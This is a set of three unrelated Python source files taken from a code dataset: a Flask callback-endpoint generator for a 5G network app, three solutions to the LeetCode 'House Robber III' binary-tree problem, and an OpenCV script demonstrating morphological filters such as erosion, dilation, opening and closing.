            url_rule = "/monitoring/loc" + str(self.num_location_ep)
            self.num_location_ep += 1
            endpoint = CustomEndpoint(type_endpoint, url_rule, ['POST'], func, self.flask_port)
        elif type_endpoint == EndpointType.UE_GBR:
            url_rule = "/monitoring/gbr" + str(self.num_gbr_ep)
            self.num_gbr_ep += 1
            endpoint = CustomEndpoint(type_endpoint, url_rule, ['POST'], func, self.flask_port)
        else:
            # NOTE(review): NameError is an odd choice here (ValueError would
            # fit better) but it is kept so existing callers' handlers still work.
            raise NameError('Unknown endpoint type id ' + str(type_endpoint))
        self.endpoints.append(endpoint)
        return endpoint

    def create_web_endpoint(self, url, func):
        endpoint = CustomEndpoint(EndpointType.WEB, url, ['GET'], func, self.flask_port)
        self.endpoints.append(endpoint)
        return endpoint
class CustomEndpoint:
    """One Flask endpoint plus the externally reachable URL that targets it."""

    def __init__(self, type_ep, url_rule, methods, func, flask_port):
        self.type_ep = type_ep
        self.url_rule = url_rule
        self.methods = methods
        self.func = func
        # Full callback URL: <NEF_CALLBACK_URL><flask_port><url_rule>.
        # NOTE(review): os.getenv returns None when NEF_CALLBACK_URL is unset,
        # which makes this concatenation raise TypeError -- confirm the env
        # var is guaranteed at this point.
        base_url = os.getenv('NEF_CALLBACK_URL')
        self.complete_url = base_url + str(flask_port) + url_rule
| EVOLVED-5G/ImmersionNetApp | src/python/request/endpoint/EndPointGenerator.py | EndPointGenerator.py | py | 1,904 | python | en | code | 0 | github-code | 13 |
22787953051 | # Definition for a binary tree node.
class TreeNode(object):
    """Binary-tree node: a value plus optional left/right children."""

    def __init__(self, x):
        self.val = x
        # Children start empty; callers link nodes up after construction.
        self.left = None
        self.right = None
# Naive top-down recursion: recomputes the same subtrees many times and
# times out on large inputs (kept for reference).
class Solution(object):
    def rob(self, root):
        """Return the max sum obtainable from non-adjacent tree nodes."""
        if root is None:
            return 0
        # Option 1: skip the root and rob both subtrees freely.
        skip_root = self.rob(root.left) + self.rob(root.right)
        # Option 2: take the root, then the best of each grandchild subtree.
        take_root = root.val
        if root.left is not None:
            take_root += self.rob(root.left.left) + self.rob(root.left.right)
        if root.right is not None:
            take_root += self.rob(root.right.left) + self.rob(root.right.right)
        return max(take_root, skip_root)
# Memoised variant: remember the answer for every node already solved so
# each subtree is computed only once.
class Solution2(object):
    def __init__(self):
        # Cache: node -> best loot obtainable from that node's subtree.
        self.visited = {}

    def rob(self, root):
        """Return the max sum obtainable from non-adjacent tree nodes."""
        if root in self.visited:
            return self.visited[root]
        if root is None:
            return 0
        # Take the root together with the best of the grandchild subtrees...
        take_root = root.val
        if root.left is not None:
            take_root += self.rob(root.left.left) + self.rob(root.left.right)
        if root.right is not None:
            take_root += self.rob(root.right.left) + self.rob(root.right.right)
        # ...or skip the root and rob both children freely.
        skip_root = self.rob(root.left) + self.rob(root.right)
        self.visited[root] = max(take_root, skip_root)
        return self.visited[root]
# Optimal: a single post-order pass.  Each node returns a pair
# (best when this node is robbed, best when it is skipped), so only the
# two children are visited per step instead of six descendants.
class Solution3(object):
    def rob(self, root):
        """Return the max sum obtainable from non-adjacent tree nodes."""
        def best_pair(node):
            if node is None:
                return [0, 0]
            left_pair = best_pair(node.left)
            right_pair = best_pair(node.right)
            # Robbing this node forces both children to be skipped.
            robbed = node.val + left_pair[1] + right_pair[1]
            # Skipping it lets each child pick its own best option.
            skipped = max(left_pair) + max(right_pair)
            return [robbed, skipped]
        return max(best_pair(root))
| lmb633/leetcode | 337rob.py | 337rob.py | py | 2,012 | python | en | code | 0 | github-code | 13 |
5186419565 | import cv2
import numpy as np
img = cv2.imread('im.jpg', 0)  # load the source image as grayscale
# NOTE(review): cv2.imread returns None when 'im.jpg' is missing -- confirm
# the file is expected to sit next to this script.
kernel = np.ones((5, 5), np.uint8)  # 5x5 all-ones structuring element


def show(title, image):
    """Display *image* in a window until a key is pressed, then close it."""
    cv2.imshow(title, image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()


# Erosion
erosion = cv2.erode(img, kernel, iterations=1)
cv2.imwrite('Erosion.jpg', erosion)
show('Erosion', np.hstack((img, erosion)))

# Dilation
dilation = cv2.dilate(img, kernel, iterations=1)
cv2.imwrite('Dilation.jpg', dilation)
show('Dilation', np.hstack((img, dilation)))

# Opening (erosion then dilation)
opening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)
cv2.imwrite('Opening.jpg', opening)
show('Opening', np.hstack((img, opening)))

# Closing (dilation then erosion)
closing = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)
cv2.imwrite('Closing.jpg', closing)
show('Closing', np.hstack((img, closing)))

# Side-by-side comparisons of the basic operators.
show('Erosion vs Dilation vs Opening', np.hstack((erosion, dilation, opening)))
show('Dilation vs Erosion vs Closing', np.hstack((dilation, erosion, closing)))
show('Opening vs Closing', np.hstack((opening, closing)))

## Structuring Element
# Compare kernel shapes, each applied through the closing filter.
rect_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))     # Rectangular
ellip_kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5, 5))  # Elliptical
cross_kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (5, 5))    # Cross-shaped

rect_op = cv2.morphologyEx(img, cv2.MORPH_CLOSE, rect_kernel)
ellip_op = cv2.morphologyEx(img, cv2.MORPH_CLOSE, ellip_kernel)
cross_op = cv2.morphologyEx(img, cv2.MORPH_CLOSE, cross_kernel)
show('Rectangular vs Elliptical vs Cross-shaped Kernel with Closing Morpholoical Filter',
     np.hstack((rect_op, ellip_op, cross_op)))
| PimKanjana/Morphological-Filters | morpho.py | morpho.py | py | 2,321 | python | en | code | 0 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.